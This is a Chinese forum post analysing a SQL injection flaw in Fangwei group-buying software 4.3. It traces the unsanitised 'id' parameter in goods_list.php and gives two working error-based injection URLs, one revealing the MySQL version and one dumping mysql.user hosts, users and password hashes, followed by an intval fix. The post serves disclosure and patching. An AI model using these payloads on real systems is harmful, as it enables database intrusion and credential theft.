方维团购4.3最新版sql注入漏洞

很久没上论坛了，今天看到了发布的方维团购4.3最新版sql注入漏洞利用工具
好吧，根据撸主的信息，加上之前有分析过方维，很快就定位到了
\\app\source\goods_list.php

if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
假如m=goods,a=showcate并且传递的id值不为空
$catepid = $_REQUEST['id'];
//用来获取接收的参数id
再带入sql语句
select pid from " . DB_PREFIX . "goods_cate where id=".$catepid

1.判断mysql版本

index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

2.获取mysql账号密码

index.php?m=Goods&a=showcate&id=103%20and%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(0x3a,host,0x3a,user,0x3a,password)%20FROM%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)

修复

if($_REQUEST['m'] =="Goods" && $_REQUEST['a'] == "showcate" && $_REQUEST['id']!="")
 {
 //$catepid = $_REQUEST['id']; //用来获取接收的参数
$catepid = intval ($_REQUEST ['id']); //强制转换
foreach($sidegoodscatelist as $k => $v){ //foreach as
if($v['id']==$catepid)
{
 $is_top_cate=1;
}
}

本文转自：http://www.2cto.com/Article/201407/316502.html